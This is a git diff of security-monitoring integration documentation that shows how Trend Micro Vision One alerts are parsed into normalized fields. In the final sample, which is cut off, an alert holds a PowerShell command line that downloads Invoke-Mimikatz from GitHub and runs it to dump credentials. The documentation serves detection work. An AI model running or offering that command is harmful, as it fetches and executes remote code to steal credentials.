a/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md b/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md index b6d8df0b0..8255b04ac 100644 --- a/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md +++ b/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md @@ -1754,6 +1754,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "record_id": 1674356873, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -1775,6 +1783,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ @@ -1835,6 +1844,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "record_id": 783949626, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -1856,6 +1873,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ @@ -5389,6 +5407,11 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "record_id": 2324634, "type": "Security" }, + "destination": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "size_in_char": 7 + }, "host": { "hostname": "test", "name": "test" @@ -5410,12 +5433,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ + "1.2.3.4", "test" ], + "ip": [ + "10.24.25.25" + ], "user": [ "testUser" ] }, + "source": { + "address": "10.24.25.25", + "ip": "10.24.25.25" + }, "user": { "domain": "NT01", "id": "S-1-5-21-1111111111-111111111-1111111111-1111", @@ -8164,6 +8195,7 @@ The following table lists the fields that are extracted, normalized under the EC |`source.address` | `keyword` | Source network address. | |`source.domain` | `keyword` | The domain name of the source. | |`source.ip` | `ip` | IP address of the source. | +|`source.mac` | `keyword` | MAC address of the source. | |`source.port` | `long` | Port of the source. | |`source.size_in_char` | `number` | | |`url.domain` | `keyword` | Domain of the url. | diff --git a/_shared_content/operations_center/integrations/generated/9844ea0a-de7f-45d4-9a9b-b07651f0630e.md b/_shared_content/operations_center/integrations/generated/9844ea0a-de7f-45d4-9a9b-b07651f0630e.md new file mode 100644 index 000000000..a7a19d56e --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/9844ea0a-de7f-45d4-9a9b-b07651f0630e.md @@ -0,0 +1,624 @@ + +### Event Categories + + +The following table lists the data source offered by this integration. + +| Data Source | Description | +| ----------- | ------------------------------------ | +| `Process monitoring` | None | + + + + + +In details, the following table denotes the type of events produced by this integration. + +| Name | Values | +| ---- | ------ | +| Kind | `alert` | +| Category | `intrusion_detection` | +| Type | `info` | + + + + +### Transformed Events Samples after Ingestion + +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog.md) and hunting activities in the [events page](/xdr/features/investigate/events.md). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma.md) and to leverage the full potential of the collected data. + +=== "test_eicar_test_file_detection.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "action": "File quarantined", + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Eicar Test File Detection", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:51:29Z", + "file": { + "hash": { + "sha1": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + }, + "name": "eicar-com.txt", + "path": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt" + }, + "host": { + "id": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "related": { + "hash": [ + "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + ], + "ip": [ + "10.0.0.6" + ] + }, + "rule": { + "name": "Eicar Test File Detection" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "detection_name": "Eicar_test_1", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + } + } + + ``` + + +=== "test_information_gathering.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Potential Information Gathering", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:48:06Z", + "host": { + "id": "7b00c266-f17f-439f-bb94-3945d463a78b", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha1": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "sha256": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753" + }, + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753", + "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + ], + "ip": [ + "10.0.0.6" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Potential Information Gathering" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } + + ``` + + +=== "test_internal_network_scanner.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Internal Network Scanner", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509" + }, + "@timestamp": "2024-07-23T14:46:11Z", + "file": { + "directory": "C:\\Users\\doe.john\\Downloads", + "hash": { + "sha256": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + }, + "name": "Advanced_IP_Scanner_2.5.4594.1.exe", + "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" + }, + "host": { + "id": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F", + "ip": [ + "1.2.3.4" + ], + "name": "doe10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631" + } + }, + "related": { + "hash": [ + "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631", + "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "doe" + ] + }, + "rule": { + "name": "Internal Network Scanner" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "john", + "id": "john\\doe", + "name": "doe" + } + } + + ``` + + +=== "test_process.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": 